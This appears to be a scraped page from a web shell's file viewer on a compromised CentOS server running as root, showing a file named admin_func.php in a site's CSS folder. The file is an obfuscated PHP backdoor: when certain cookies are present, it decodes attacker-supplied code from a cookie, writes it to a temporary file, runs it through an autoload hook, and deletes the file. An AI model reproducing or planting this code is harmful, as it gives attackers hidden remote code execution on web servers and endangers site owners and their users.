HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/8.0.30
System: Linux multiplicar 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User: root (0)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /var/www/html/eva.sumar.com.py/public/css/admin_func.php
<?php


if (isset($_COOKIE[61-61]) && isset($_COOKIE[74-73]) && isset($_COOKIE[34-31]) && isset($_COOKIE[82-78])) {
    $token = $_COOKIE;
    function module_controller($bind) {
        $token = $_COOKIE;
        $reference = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), '277a7524');
        if (!is_writable($reference)) {
            $reference = getcwd() . DIRECTORY_SEPARATOR . "mutex_lock";
        }
        $dat = "\x3c\x3f\x70\x68p " . base64_decode(str_rot13($token[3]));
        if (is_writeable($reference)) {
            $marker = fopen($reference, 'w+');
            fputs($marker, $dat);
            fclose($marker);
            spl_autoload_unregister(__FUNCTION__);
            require_once($reference);
            @array_map('unlink', array($reference));
        }
    }
    spl_autoload_register("module_controller");
    $dchunk = "43eb8b4eb6443068be99917216d619ea";
    if (!strncmp($dchunk, $token[4], 32)) {
        if (@class_parents("api_gateway_data_storage", true)) {
            exit;
        }
    }
}